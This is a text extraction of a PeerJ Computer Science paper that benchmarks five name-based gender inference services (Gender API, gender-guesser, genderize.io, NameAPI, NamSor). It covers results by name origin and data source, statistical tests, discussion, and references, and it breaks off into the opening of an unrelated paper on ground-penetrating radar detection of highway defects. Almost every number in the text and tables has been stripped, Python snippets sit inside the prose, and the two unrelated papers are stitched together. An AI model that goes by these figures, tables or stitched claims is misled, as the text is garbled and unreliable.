these services minimize the number of elements outside the diagonal. in other words, they produce the least number of misclassifications when ignoring the non-classifications. this is indicative of a high-quality data curation when incorporating names into the database. regarding the error in gender bias, the worst offenders are genderize.io and gender api, although in reverse directions; while the former wrongly identifies more men as women, the latter does the opposite, which means that results santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table confusion matrices for all services using their default responses without parameter tuning. mpred fpred upred (a) gender api m , f , (b) gender-guesser m , f , (c) genderize.io m , f , (d) nameapi m , f , (e) namsor m , f , table benchmark a: performance metrics for all services with their default gender assignments on the entire data set. the weightederror is computed with w = . . errorcoded errorcodedwithoutna errorgenderbias nacoded weightederror gender api . . − . . . gender-guesser . . . . . genderize.io . . . . . nameapi . . . . . namsor . . . . . obtained with gender api may underestimate the amount of females. finally, measured in terms of the weighted error with w = . , all services perform quite similarly, with gender api producing the lowest error. it is perhaps necessary to point out that, despite the high accuracy level of various gender predictions according to the services’ responses, some persons indeed remain misclassified. we can provide several examples extracted from our analysis: ‘dana’ is thought to be female with % accuracy by gender api, . confidence by nameapi, and . probability by genderize.io, while namsor more conservatively sets its scale to . . in fact, our test data set includes a male ‘dana’. 
similarly, 'michal', the name of a female researcher, is classified as male with % accuracy by gender api, . confidence by nameapi, - . scale by namsor, and . probability by genderize.io. ultimately it all comes down to internal heuristics and the way each service weights the counts for a particular name from its multiple data sources. it is thus unavoidable to end up with a number of misclassified names, and this should be taken into account when making absolute claims about the validity of results based on these services.

figure boxplots depicting quartiles for the confidence parameters of the gender inference services, split by the geographical regions africa, asia, and europe as returned by namsor's origin api. panels (a), (b), (c), (d), and (e) display the parameters accuracy of gender api, the self-constructed confidence of gender-guesser, probability of genderize.io, confidence of nameapi, and scale of namsor, respectively. the bottom and top of the colored boxes mark the first and third quartiles of the distribution; the line in the middle of the boxes indicates the median; the ends of the whiskers correspond to the lowest and highest data points within . interquartile range.

benchmark b: analysis by name origin and data source
next, we investigate the impact of the names' origin on the performance of the services under evaluation. as described above, all services return a confidence parameter indicating the trustworthiness of the classification; recall that for the python package gender-guesser we have created one such parameter by setting it to . for the responses 'mostly_female' or 'mostly_male' and for 'female' or 'male'. we investigate the confidence parameters for different geographical origins of the test names. the boxplots in fig. show statistics from the quartiles of the parameters' distributions, split by the top regions predicted by namsor's origin api. note that all services produce responses that are discernibly dependent on the names' origin: the most confident gender predictions are for names of european origin, while asian names generally lead to a lower median and a higher deviation. the service nameapi displayed in fig. d stands out insofar as the medians of its confidence values are lower than those of the other services, indicating a different kind of normalization. this is in accordance with the bimodal parameter distribution peaking at around . depicted in fig. a. there is also little difference between the median values for the three geographical regions, suggesting that nameapi's confidence parameter is not as useful for discriminating between easy and complex cases. it is also worth noting in fig. c that genderize.io assigns gender to asian names with significantly higher confidence values than the other services: the median value for asian names is surprisingly almost as high as for european names. the lower confidence in gender assignments for asian names reported by almost all services suggests focusing on that case. as shown in fig. , which displays results broken down by asian subregions, names from eastern and south-eastern asia yield significantly smaller values than other asian regions. this is to be expected, in particular due to chinese names, for which the difficulty of inferring a gender from latin transcriptions is well known.

figure boxplots depicting quartiles for the confidence parameters of the gender inference services for the asian subregions (central, eastern, south-eastern, southern, and western asia) as returned by namsor's origin api, with boxplot settings as in fig. .

table benchmark b, name origin: performance of all services with their default gender assignments in terms of the metrics errorcoded and errorcodedwithoutna, broken down by name origin (africa, asia, europe). values are rounded to four decimal figures.

nonetheless, while namsor and gender-guesser have almost no confidence in the gender inference of east asian names, gender api shows a notably high median value. nameapi and genderize.io again exhibit similar medians for all subregions, confirming that the values of their confidence parameters are decoupled from the names' origins, and thus from the complexity of the assignment. this fact makes us doubt that nameapi's confidence and genderize.io's probability parameters are sufficiently meaningful. table quantifies the errors incurred by the different services depending on the names' origin. gender api achieves the best results for errorcoded; however, its performance is strongly affected by the names' origin, being one order of magnitude worse for asian ( % inaccuracies) than for european names ( %). namsor performs similarly for european ( %) and african names ( %), but is considerably worse for asian ones ( %). regarding the fraction of misclassifications (errorcodedwithoutna), we note that gender-guesser, with its small but highly accurate database, achieves a mere . % error in classifying european names, while for asian names the figure increases to %. generally speaking, we conclude that all services clearly show the challenging nature of inferring gender for asian names. next, let us consider the errors in gender inference depending on the source of the names, as displayed in table . for both errors, all services perform much worse on the wos data subset
table benchmark b, data source: performance of all services with their default gender assignments in terms of the metrics errorcoded and errorcodedwithoutna, broken down by data source.
values are rounded to four decimal figures. errorcoded errorcodedwithoutna zbmath genderize_r_ authors genderize_r_ titles pubmed wos zbmath genderize_r_ authors genderize_r_ titles pubmed wos gender api . . . . . . . . . . gender-guesser . . . . . . . . . . genderize.io . . . . . . . . . . nameapi . . . . . . . . . . namsor . . . . . . . . . . table benchmark a: minimization of inaccuracies constrained to a % misclassification error on the entire data set. displayed are the mean and standard deviation of the values of errorcoded for all ser- vices, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor mean . . . . . std . . . . . than on the others. this is in accordance with the fact that the wos collection incorporates a higher percentage of asian names, as evidenced by fig. . regardless, the results follow the general trend: gender api achieves the smallest fraction of inaccuracies for all data sources, whereas gender-guesser often beats other services in terms of misclassifications. overall we conclude that the breakdown of errors by data source is consistent with the analysis split by names’ origin. data sets composed of western names have a much larger chance of being correctly attributed a gender than asian ones. benchmark : minimization of inaccuracies constrained to a % misclassification error we measure the performance of all services with respect to the fraction of inaccuracies (errorcoded) under the constraint that at most % of all successfully classified names are misclassified as female or male, i.e., they fulfill errorcodedwithoutna < . . this is a realistic constellation for applications requiring the rate of misclassifications not to exceed a given threshold. benchmark a: entire data set we apply our parameter tuning procedure to minimize errorcoded on the entire data set and display the averaged test errors per service in table . in each of the runs of -fold cross-validation, gender api produces the lowest error, namsor the second lowest. in this scenario, it is possible to achieve an average inaccuracy rate under % over the whole data set while keeping the misclassification error under % with gender api. namsor and genderize.io achieve second place with average inaccuracy rates just under %. in order to assess whether the difference in performance is statistically significant, we apply a two-matched-samples t-test to the results of the two best services. since our data set is relatively large and the data sets have been obtained by random sampling, one needs to santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table benchmark b: minimization of inaccuracies constrained to a % misclassification error. dis- played are the values of errorcoded for all services and data sources, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor zbmath . . . . . genderize_r_authors . . . . . genderize_r_titles . . . . . pubmed . . . . . wos . . . . . show that the assumption of homogeneity of variance is satisfied prior to applying a t-test (see e.g., japkowicz & shah ( ) (p. ff)). levene’s test applied to the errors of gender api and namsor yields a large p-value of . , and so we conclude that there is (almost) no difference between their variances. the t-test returns a very small p-value < . , while the absolute value of cohen’s d-statistic is . . 
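the variance and significance checks just described can be reproduced with standard scipy routines; the sketch below assumes two arrays of per-fold errors obtained on identical cross-validation splits and reports levene's test, a matched-samples t-test, and cohen's d as effect size. the numbers in the usage example are placeholders, not the study's fold errors.

```python
import numpy as np
from scipy import stats

def compare_cv_errors(errors_a, errors_b, alpha=0.05):
    """Compare two matched samples of cross-validated errors from identical folds.

    Performs Levene's test for equality of variances, a paired (matched-samples)
    t-test, and computes Cohen's d (pooled-standard-deviation version) as effect size.
    """
    a, b = np.asarray(errors_a, float), np.asarray(errors_b, float)
    levene_stat, levene_p = stats.levene(a, b)   # H0: equal variances
    t_stat, t_p = stats.ttest_rel(a, b)          # paired t-test on per-fold errors
    pooled_sd = np.sqrt((a.var(ddof=1) + b.var(ddof=1)) / 2.0)
    cohens_d = (a.mean() - b.mean()) / pooled_sd
    return {"equal_variances": levene_p > alpha,
            "levene_p": levene_p,
            "ttest_p": t_p,
            "cohens_d": cohens_d}

# illustrative numbers only
print(compare_cv_errors([0.020, 0.022, 0.019, 0.021], [0.031, 0.029, 0.033, 0.030]))
```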
this means that gender api’s error is statistically significantly lower than namsor’s and the effect size is large. the parameter tuning procedure on the entire data set for this benchmark leads to optimal parameters close to the default case, maximizing the number of names that are assigned a gender; for instance, the optimal values for gender api’s accuracy and samples are and , respectively, while namsor’s scale is tuned to . . benchmark b: analysis by data source for the split analyses we perform one run of -fold cross-validation per service and data source; results are displayed in table and show that gender api is the best performer in all cases. incidentally, all services achieve one order of magnitude worse results on the data set wos than on the others. nameapi and gender-guesser did in fact repeatedly fail to satisfy the constraint, in which case we had to set the error to for the respective fold. we have applied the friedman test with the result that the difference in performance among services is statistically significant at significance level . . as a post-hoc test we have applied the nemenyi test in order to find out which classifiers actually differ. however, the nemenyi test is not powerful enough to detect statistical significance between any classifiers except gender api and nameapi. since we are particularly interested in the best performers, we have compared gender api and namsor using the sign test instead, which counts the number of data sets on which the one classifier outperforms the other. accordingly, gender api is significantly better than namsor at the confidence level . . benchmark : minimization of misclassifications constrained to a % non-classification rate next we evaluate the effectiveness for achieving correct classifications, i.e., we minimize the rate of misclassifications (errorcodedwithoutna) constrained to the amount of names that cannot be classified being lower than % of all assignments (nacoded < . ). this represents a rather frequent situation of wanting to incur as few misclassifications as possible, while at the same time being able to assign a gender to at least a pre-defined fraction of the evaluated names. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we have applied the sign test to the test errors in the first trial, since multiple trials violate the independent domain assumption. gender api outperforms namsor in seven of folds but this is not significant in terms of the sign test which would require eight folds. table benchmark a: minimization of misclassifications constrained to a % non-classification rate on the entire data set. displayed are the mean and the standard deviation of errorcodedwithoutna for all services, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor mean . . . . . std . . . . . table benchmark b: minimization of misclassifications constrained to a % non-classification rate. displayed are the values of errorcodedwithoutna for all services and data sources, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor zbmath . . . genderize_r_authors . . . . . genderize_r_titles . . . . . pubmed . . . . . wos . . . . benchmark a: entire data set as shown in table , gender api outperforms the other services with a . % misclassification rate, followed by namsor with . % and genderize.io with . %. 
to achieve these results, the three services need to be tuned to optimal parameters with higher values of confidence (roughly accuracy > and samples > , ; scale > . ; probability > . and count > , , respectively). since the variances of gender api and namsor are not similar, a t-test cannot be applied to measure the difference between the two best performers . however, it can be applied to the comparison of gender api and genderize.io, with the result that gender api outperforms genderize.io significantly with large effect size. benchmark b: analysis by data source for most of the analyzed data sources gender api outperforms all other services; error figures are displayed in table . on names from the pubmed collection, gender api and genderize.io are equally good; on the zbmath subset, gender api and namsor achieve a perfect score. again, all services perform one order of magnitude worse on names from wos than on the other subsets. nameapi did not satisfy the constraint on various folds, gender-guesser in fact on none of them. as in benchmark b, the friedman test shows statistical significance at significance level . . neither the nemenyi test nor the sign test confirm significance between the performance of gender api and namsor at level . . we conclude that none of the tests considered suitable for comparing gender api and namsor are able to confirm that gender api is statistically significantly better in this case. benchmark : minimization of the weighted error with w = . finally we analyze the case of minimizing the weighted error with w = . , namely the metric that treats all inaccuracies (misclassifications and non-classifications) as errors, but santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table benchmark a: minimization of the weighted error with weight w = . . displayed are the mean and the standard deviation of the values of weightederror for all services, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor mean . . . . . std . . . . . table benchmark b: minimization of the weighted error with weight w = . . displayed are the values of weightederror for all services and data sources, rounded to four decimal figures. gender api gender-guesser genderize.io nameapi namsor zbmath . . . . . genderize_r_authors . . . . . genderize_r_titles . . . . . pubmed . . . . . wos . . . . . puts five times more weight into the former. this corresponds to an intermediate situation between benchmarks and , and the approach has the flexibility of allowing a continuous range of values for the weight w, depending on the particular needs of each analysis. benchmark a: entire data set the best results are achieved by gender api and namsor with weighted error values of . and . , respectively, as shown in table . since the variance of the two best performers is almost equal, we can apply the t-test, which yields statistical significance at significance level . . also, cohen’s d-statistic confirms that the difference in performance is practically relevant. as expected, the parameter tuning procedure on the entire data set leads to optimal parameters between those computed for the previous two benchmarks; for instance, the optimal values for gender api’s accuracy and samples are and , , respectively, while namsor’s scale is tuned to . . benchmark b: analysis by data source in table we present results from minimizing weightederror with weight w = . for all services and data sources. 
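the non-parametric comparisons used in the b-benchmarks can be sketched as follows; the friedman test and a sign test (via the binomial distribution) are available directly in scipy, while a nemenyi post-hoc test would require an additional package such as scikit-posthocs (mentioned here as an option, not as a dependency of the original code). the error values in the example are placeholders.

```python
import numpy as np
from scipy import stats

def friedman_and_sign_test(errors_by_service, service_a, service_b, alpha=0.05):
    """Rank-based comparison of several services over multiple data sets.

    errors_by_service -- dict {service_name: [error on data set 1, data set 2, ...]}
    service_a/b       -- the two best performers compared head-to-head with a sign test
    """
    # Friedman test: do the services differ across data sets?
    samples = [np.asarray(v, float) for v in errors_by_service.values()]
    friedman_stat, friedman_p = stats.friedmanchisquare(*samples)

    # One-sided sign test: on how many data sets does A achieve a lower error than B?
    a = np.asarray(errors_by_service[service_a], float)
    b = np.asarray(errors_by_service[service_b], float)
    wins_a = int(np.sum(a < b))
    decided = int(np.sum(a != b))
    sign_p = stats.binomtest(wins_a, decided, p=0.5, alternative="greater").pvalue

    # A Nemenyi post-hoc test could be added via scikit_posthocs.posthoc_nemenyi_friedman (not shown).
    return {"friedman_p": friedman_p,
            "friedman_significant": friedman_p < alpha,
            "sign_test_p": sign_p}

errors = {"gender_api": [0.01, 0.02, 0.01, 0.02, 0.08],
          "namsor":     [0.02, 0.03, 0.02, 0.03, 0.10],
          "genderize":  [0.03, 0.03, 0.02, 0.04, 0.12]}
print(friedman_and_sign_test(errors, "gender_api", "namsor"))
```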
gender api is the best performing service on all data sets; namsor reaches the second best values on four out of five data sources. the friedman test shows that the performances are statistically significant at significance level of . . furthermore, the sign test shows that gender api is significantly better than namsor at significance level . . discussion name-based gender inference poses numerous challenges. to name a few, the association of a name with gender depends on the cultural and regional context, hence relying on the first name only can be highly error-prone. transliteration from other alphabets into the santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. latin one is known to lead to significant losses of information, thereby excluding entire populations from a reliable classification. incidentally, the gender of some names might depend not only on culture, but also on historical epoch, and so there exist names that were e.g., typically male in the past and are nowadays female or unisex. furthermore, first names are per se embedded into the gender binary, hence this approach reinforces a non-inclusive gender concept and further marginalizes individuals that do not identify as women or men. clearly, the best way to enrich personal data with this type of demographic information is to ask for self-identification. that would not only increase the correctness of the data; it is also to be preferred under ethical considerations, since it avoids the offensiveness of assigning categories to individuals, while allowing for inclusion of identities beyond the gender binary. self-identification is not feasible though in large-scale studies of historical data that are typical for bibliometric analyses. thus the usage of automated methods to infer gender from names or from alternative available details is unavoidable. for a thorough discussion of the ethics of gender identification, see matias ( ) and references therein. notwithstanding the above caveats, we have performed a comprehensive comparison of available gender inference tools, testing five services on a manually labeled data set containing , names, of which , have a definite gender and are subjected to our analyses. for our evaluations, it would have been desirable to use an open collection of names with labels obtained through self-identification. we are not aware of such a set, thus we have used data based on judgments of third parties. as described in the section ‘assemblage of test data’ we have corrected a non-trivial amount of gender assignments, which unfortunately does not preclude potential remaining classification mistakes. making the test data set public might help to correct them. furthermore, we have assessed the geographical diversity of our test names, concluding that approximately half of them are of european origin, slightly less than half are asian, and the remaining % are african. names of persons from the american and australian continents are considered to descend from these three main regions. we deem this distribution to be appropriate for the task at hand. we have devised and run various benchmarks to compare all five inference services in several scenarios. in particular, we have computed all performance metrics using the default responses without any further tuning. we have studied the default responses broken down by geographical origin of names and by data source. 
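such a breakdown is straightforward to reproduce once every test name carries a true gender, a predicted gender, and an origin or source label; the pandas sketch below assumes a data frame with illustrative column names and toy values, not the study's data.

```python
import pandas as pd

def breakdown_errors(df, by="origin"):
    """Fraction of inaccuracies (errorCoded) per group.

    df -- DataFrame with columns 'true_gender' (f/m), 'predicted_gender' (f/m/u)
          and a grouping column such as 'origin' or 'source' (assumed layout).
    """
    wrong = df["predicted_gender"] != df["true_gender"]   # misclassified or unclassified
    return wrong.groupby(df[by]).mean().sort_values()

names = pd.DataFrame({
    "true_gender":      ["f", "m", "f", "m", "f", "m"],
    "predicted_gender": ["f", "m", "u", "f", "f", "m"],
    "origin":           ["europe", "europe", "asia", "asia", "africa", "africa"],
})
print(breakdown_errors(names, by="origin"))
```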
additionally, we have performed parameter tuning to search for the optimal values of the confidence indicators that lead to minimization of misclassification or inaccuracy rates, while constraining the maximum error on the other quantity. we have broken down these analyses by data source as well. finally, we have applied various tests to measure whether the observed differences in performance are statistically significant. python package gender-guesser achieves the lowest misclassification rate without parameter tuning for the entire data set, introducing also the smallest gender bias. at the same time it shows poor performance in terms of non-classifications, which is understandable given its comparatively small data base. as the only completely free service with open data and logic, we reckon that it can be useful as a first step of a multi-stage santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considering the problems arising with middle names, as described for gender api and namsor, it might make sense to drop them, or to query with only the first name when the genders of first and middle are in disagreement. gender inference procedure. gender api is the best performer in terms of fraction of inaccuracies, and also in proportion of non-classifications. when breaking down results without parameter tuning by names’ origin we find out that all services perform at least one order of magnitude better on names of european origin than on asian names. in particular, this translates to poorer results on the wos names subset, which is the less eurocentric collection of all analyzed data sources. this confirms that assessments of errors in gender inference studies should be made with particular care when the cultural makeup of the analyzed names is unknown. for instance, the genderizer data subsets employed in the analysis of wais ( ) contain predominantly western records, which is possibly at the root of the good results produced by a genderize.io service that, as we show, is not particularly well suited for inferring the gender of asian names. in modern scholarly publications, the share of authors of asian origin is significant though and thus this caveat needs to be addressed. gender api typically achieves the best results after performing parameter tuning to optimize for particular scenarios. it is noteworthy to recall that, in contrast to namsor and nameapi, gender api uses first names only. using the tuned parameters of gender api, it is possible to obtain a rate of inaccuracies of . % constrained to not more of % of names being misclassified, a result significantly better than that achieved by the second best service namsor. likewise, the misclassification error can be made as low as . % while still retaining a classification label for at least % of the entire data set. next in performance is service namsor, closely followed by genderize.io, both of which achieve a misclassification rate under % in that latter scenario. our results indicate that analyses based on gender predictions by these methods are to be considered as more reliable than regular queries to country censuses or birth name lists. the addition of further benchmark settings based on supplementary performance metrics might be of interest. 
for instance, an appropriate measure would be the area under the roc curve (auc), which is particularly useful when one of the outcome classes is skewed, as is expected for authorships randomly drawn from databases in stem disciplines. a disadvantage of the commercial services though is the lack of transparency regarding their data sources, specifically how records are gathered and processed. furthermore, the algorithms behind the gender assignments are closed, too, while explanations are usually provided only on the level of technical usage, based on simple examples such as ‘john smith’. both aspects hamper efforts towards reproducibility of results. at the same time, given the substantial cost of some of the services, a better treatment of specific peculiarities like double names would be expected . to give another example of trivial errors, nameapi classifies ‘paul pinsky’ as female with confidence . , while ‘paul pinsky’ or ‘paul pinsky’ are returned as male with confidence . . hence, we recommend potential users to thoroughly test any given service with comprehensive examples before going into production. our benchmarks and tests aim to provide first solid evidence of the services’ capabilities. for the presented benchmarks we have restricted to names containing at least a first and a last name. yet the last name may sometimes suffice to infer the gender with high probability; this is e.g., the case for many (though not all) names from russia or poland. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for those services that can handle them, it would be interesting to benchmark on a test set consisting of surnames only. additionally, our data set contains only names in latin characters although various services can handle (some) non-latin alphabets, so it might be desirable to extend the data set in this direction as well. furthermore, one could expand the study to include more samples of the same first name and test the dependency of gender inference on the last name. lastly, there exist several more code packages or web services of interest: r package gender by lincoln mullen (mullen, ) utilizes various openly available sources of first names with time range as an additional feature. as explained in blevins & mullen ( ), for research of a longer time span, ‘‘the changing nature of naming practices’’ might need to be taken into consideration. conclusion the determination of a person’ gender based solely on their name is not straightforward, yet it is a relevant task for plenty of applications, including but not limited to studies of women’s representation in tech, media, or academia. in particular, bibliometric analyses of scientific publications in various academic fields have mostly made use of compiled lists of names to label authors of articles as male or female. less attention has been paid, though, to the quantification of the several errors that one can incur when doing so, or to the advantages of choosing one or another gender assignment method depending on the requirements of the analysis at hand. our comparison of five gender inference services in terms of various performance metrics such as inaccuracy, misclassification, and non-classification error rates provides a solid estimation of the accuracy to be expected in name-to-gender inference tasks. 
applying these metrics to our data set, which we break down according to the names’ geographical origin and data source, we estimate the errors incurred by the services according to the two variables. by performing cross-validated, randomized parameter tuning on a large genderized data set of scientific authors we demonstrate that with three of the surveyed services it is possible to guess the correct gender of more than % of names for which a female or male label is returned, while simultaneously leaving less than % of records unclassified. our framework can be trivially extended to account for further gender inference methods. acknowledgements we thank casper strømgren for granting us unlimited access to genderize.io and markus perl for extending us a discount offer for gender api. we are indebted to elian carsenat for allowing us to freely access namsor’s gender and origin apis. we are grateful to researchers vincent larivière, cassidy sugimoto, and kevin bonham for sharing their labeled gender data. we thank marco tullney for comments on the submitted version. we acknowledge and appreciate the two anonymous referees for carefully reading the manuscript and suggesting substantial improvements. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by the grants programme of the international council for science (icsu), through project ‘‘a global approach to the gender gap in mathematical, computing, and natural sciences: how to measure it, how to reduce it?’’. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: grants programme of the international council for science (icsu). competing interests the authors declare there are no competing interests. author contributions • lucía santamaría conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, prepared the paper for submission. • helena mihaljević conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, set up code and data repository. data availability the following information was supplied regarding data availability: evaluation of name-based gender inference methods: https://github.com/ gendergapstem-publicationanalysis/name-gender-inference references blevins c, mullen l. . jane, john ... leslie? a historical method for algorithmic gender prediction. digital humanities quarterly ( ). bonham ks, stefan mi. a. gender in computational biology. available at https: //github.com/kescobo/gender-comp-bio. bonham ks, stefan mi. b. women are underrepresented in computational biology: an analysis of the scholarly literature in biology, computer science and computational biology. plos computational biology ( ): – doi . /journal.pcbi. . buolamwini j. . how i’m fighting bias in algorithms. available at https://www. media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ . santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://github.com/gendergapstem-publicationanalysis/name-gender-inference https://github.com/gendergapstem-publicationanalysis/name-gender-inference https://github.com/kescobo/gender-comp-bio https://github.com/kescobo/gender-comp-bio http://dx.doi.org/ . /journal.pcbi. https://www.media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ https://www.media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ http://dx.doi.org/ . /peerj-cs. carsenat e. . onomastics to measure cultural bias in medical research. available at https://blog.namsor.com/ / / /onomastics-to-measure-cultural-bias-in- medical-research/ . demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research : – . filardo g, da graca b, sass dm, pollock bd, smith eb, martinez mam. . trends and comparison of female first authorship in high impact medical journals: observational study ( – ). bmj :i doi . /bmj.i . frietsch r, haller i, funken-vrohlings m, grupp h. . gender-specific patterns in patenting and publishing. research policy ( ): – doi . /j.respol. . . . hastie t, tibshirani r, friedman j. . the elements of statistical learning. data mining, inference, and prediction. edition. new york: springer. holman l, stuart-fox d, hauser ce. . the gender gap in science: how long until women are equally represented? plos biology ( ): – doi . /journal.pbio. . japkowicz n, shah m. . evaluating learning algorithms. a classification perspective. new york: cambridge university press. karimi f, wagner c, lemmerich f, jadidi m, strohmaier m. . inferring gender from names on the web: a comparative evaluation of gender detection meth- ods. in: proceedings of the th international conference companion on world wide web, www’ companion. republic and canton of geneva, switzerland: international world wide web conferences steering committee, – doi . / . . larivière v, ni c, gingras y, cronin b, sugimoto cr. a. bibliometrics: global gender disparities in science. nature ( ): – doi . / a. larivière v, ni c, gingras y, cronin b, sugimoto cr. b. supplementary infor- mation to: global gender disparities in science (comment in nature , – ; ). nature ( ) doi . / a. macharia s, ndangam l, saboor m, franke e, parr s, opoku e. . who makes the news? global media monitoring project . available at http://whomakesthenews. org/gmmp- . matias jn. . how to identify gender in datasets at large scales, ethically and respon- sibly. available at https://civic.mit.edu/blog/natematias/best-practices-for-ethical- gender-research-at-very-large-scales. matias jn, szalavitz s, zuckerman e. . followbias: supporting behavior change toward gender equality by networked gatekeepers on social media. in: proceedings of the acm conference on computer supported cooperative work and social computing (cscw’ ). association for computing machinery (acm), – doi . / . . michael j. . namen, anredebestimmung anhand des vornamens. c’t : – . santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://blog.namsor.com/ / / /onomastics-to-measure-cultural-bias-in-medical-research/ https://blog.namsor.com/ / / /onomastics-to-measure-cultural-bias-in-medical-research/ http://dx.doi.org/ . /bmj.i http://dx.doi.org/ . /j.respol. . . http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . / . http://dx.doi.org/ . / a http://dx.doi.org/ . 
/ a http://whomakesthenews.org/gmmp- http://whomakesthenews.org/gmmp- https://civic.mit.edu/blog/natematias/best-practices-for-ethical-gender-research-at-very-large-scales https://civic.mit.edu/blog/natematias/best-practices-for-ethical-gender-research-at-very-large-scales http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. michael j. . dictionary of first names and gender. available at ftp://ftp.heise.de/pub/ ct/listings/ - .zip. mihaljević h, santamaría l. . evaluation of name-based gender inference methods. https://github.com/gendergapstem-publicationanalysis/name-gender-inference. mihaljević-brandt h, santamaría l, tullney m. . the effect of gender in the publication patterns in mathematics. plos one ( ): – doi . /journal.pone. . mozaffarian m, jamali hr. . iranian women in science: a gender study of scientific productivity in an islamic country. aslib proceedings ( ): – doi . / . mullen l. . gender: predict gender from names using historical data. available at https://github.com/ropensci/gender. naldi f, luzi d, valente a, vannini parenti i. . scientific and technological performance by gender. in: moed hf, glänzel w, schmoch u, eds. handbook of quantitative science and technology research: the use of publication and patent statistics in studies of s&t systems. dordrecht: springer netherlands, – . vanetta m. . gender detection. available at http://codingnews.info/post/gender- detection.html. vasilescu b, serebrenik a, filkov v. . a data set for social diversity studies of github teams. in: proceedings of the th working conference on mining software repositories, msr’ . piscataway: ieee press, – . wais k. . gender prediction methods based on first names with genderizer. the r journal ( ): – . west jd, jacquet j, king mm, correll sj, bergstrom ct. . the role of gender in scholarly authorship. plos one ( ):e doi . /journal.pone. . santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com ftp://ftp.heise.de/pub/ct/listings/ - .zip ftp://ftp.heise.de/pub/ct/listings/ - .zip https://github.com/gendergapstem-publicationanalysis/name-gender-inference http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / https://github.com/ropensci/gender http://codingnews.info/post/gender-detection.html http://codingnews.info/post/gender-detection.html http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. submitted december accepted february published march corresponding author xinyu liu, lxy@ncwu.edu.cn academic editor pengcheng liu additional information and declarations can be found on page doi . /peerj-cs. copyright liu et al. distributed under creative commons cc-by . open access non-destructive detection of highway hidden layer defects using a ground- penetrating radar and adaptive particle swarm support vector machine xinyu liu , , , peiwen hao , aihui wang , liangqi zhang , bo gu and xinyan lu chang’an university, xian, china school of electric power, north china university of water resource and electric power, zhengzhou, china henan wanli road & bridge group co. ltd., xuchang, china zhongyuan university of technology, zhengzhou, china abstract in this paper, a method that uses a ground-penetrating radar (gpr) and the adaptive particle swarm support vector machine (svm) method is proposed for detecting and recognizing hidden layer defects in highways. three common road features, namely cracks, voids, and subsidence, were collected using ground-penetrating imaging. image segmentation was performed on acquired images. 
original features were extracted from thresholded binary images and were compressed using the kl algorithm. the svm classification algorithm was used for condition classification. for parameter optimization of the svm algorithm, the grid search method and particle swarm optimization algorithm were used. the recognition rate using the grid search method was . %; the pso approach often yielded local maxima, and the recognition rate was . %; the improved adaptive pso algorithm avoided local maxima and increased the recognition rate to . %. subjects adaptive and self-organizing systems, artificial intelligence, computer vision, scientific computing and simulation keywords ground penetrating radar (gpr), image segmentation, feature extraction, support vector machine (svm), grid search method, particle swarm optimization (pso) introduction many forms of road deterioration can develop after prolonged utilization of expressways; examples include crack formation, development of voids, and subsidence (marecos et al., ). the main cause of these conditions is the appearance of cracks under the roadbed, which gradually affects the road surface and causes surface cracks. continued use of expressways causes incremental damage and can significantly increase the amount and type of maintenance work. with increasing traffic volumes in china, it is necessary to develop more efficient and automated road condition-detection methods. much research has been conducted on using ground-penetrating radars (gprs) for landform surveys. with the continuous development of the gpr technology and with the improvement of detection accuracy, the use of the gpr technology for non-destructive how to cite this article liu x, hao p, wang a, zhang l, gu b, lu x. . non-destructive detection of highway hidden layer defects us- ing a ground-penetrating radar and adaptive particle swarm support vector machine. peerj comput. sci. :e http://doi.org/ . /peerj- cs. https://peerj.com/computer-science mailto:lxy@ncwu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. http://doi.org/ . /peerj-cs. detection of structural road conditions has been garnering increasing attention. yuanlei et al. used the gpr technology to detect different physical anomalies, based on physical simulations and field tests, and the response characteristics across the two scenarios were consistent (si & wang, ). shili et al. used the gpr technology to detect hidden defects, such as road breaks, voids, and subsidence, and acquired defect images (guo, xu & li, ). literature (liang & su, ) uses amplitude attenuation method in ultrasonic testing to evaluate the corrosion damage of reinforced structures in concrete roads. document (mandal, tinjum & edil, ) detects the defects in concrete road base by ultrasonic detection technology and establishes the mathematical model of sound wave propagation in different media. literature (wen et al., ) establishes the mathematical model of ultrasonic wave propagation in asphalt pavement and concrete pavement to identify highway surface defects, 